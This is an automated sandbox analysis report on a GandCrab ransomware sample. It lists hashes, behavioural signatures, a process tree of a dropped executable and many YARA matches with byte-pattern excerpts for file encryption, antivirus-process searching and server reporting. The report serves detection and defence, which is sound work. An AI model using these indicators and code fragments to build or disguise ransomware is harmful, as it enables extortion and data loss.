Edit tour

Windows Analysis Report
IJr8RvvhZ3.exe

Overview

General Information

Sample Name:	IJr8RvvhZ3.exe
Analysis ID:	694560
MD5:	b77359bc85030f5f856b8010c0ddf6a8
SHA1:	5bff219a3d20203a239a23db69385f2611e67f5d
SHA256:	afd36e5d309ba8576b7e6a31ab1b3af4c3c0530052a2c31b97c688c0e2515005
Tags:	exe
Infos:

Detection

Gandcrab, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected ReflectiveLoader

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after checking mutex)

Contains functionality to determine the online IP of the system

Found Tor onion address

Machine Learning detection for sample

May check the online IP address of the machine

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Contains functionality to enumerate device drivers

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

IJr8RvvhZ3.exe (PID: 732 cmdline: "C:\Users\user\Desktop\IJr8RvvhZ3.exe" MD5: B77359BC85030F5F856B8010C0DDF6A8)

mqsmvj.exe (PID: 4652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 476 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 3824 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 2228 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 244 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 4940 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5636 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 2564 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 4480 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 916 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

mqsmvj.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
IJr8RvvhZ3.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
IJr8RvvhZ3.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
IJr8RvvhZ3.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
IJr8RvvhZ3.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
IJr8RvvhZ3.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
IJr8RvvhZ3.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000B.00000000.302753635.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000002.543716929.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000000.246598852.000000000F14A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000002.598200905.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000022.00000000.583307214.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000000.518024199.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000013.00000000.415482571.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000F.00000002.373855926.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000002.437171123.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000002.344076256.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001E.00000000.560904578.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000024.00000002.634796069.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000016.00000000.433686067.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000027.00000000.693057490.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000000.473313238.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000023.00000000.607979017.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001A.00000000.495173424.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000025.00000002.681141144.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000003.00000000.284909876.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000019.00000002.502607674.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000E.00000002.374541763.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
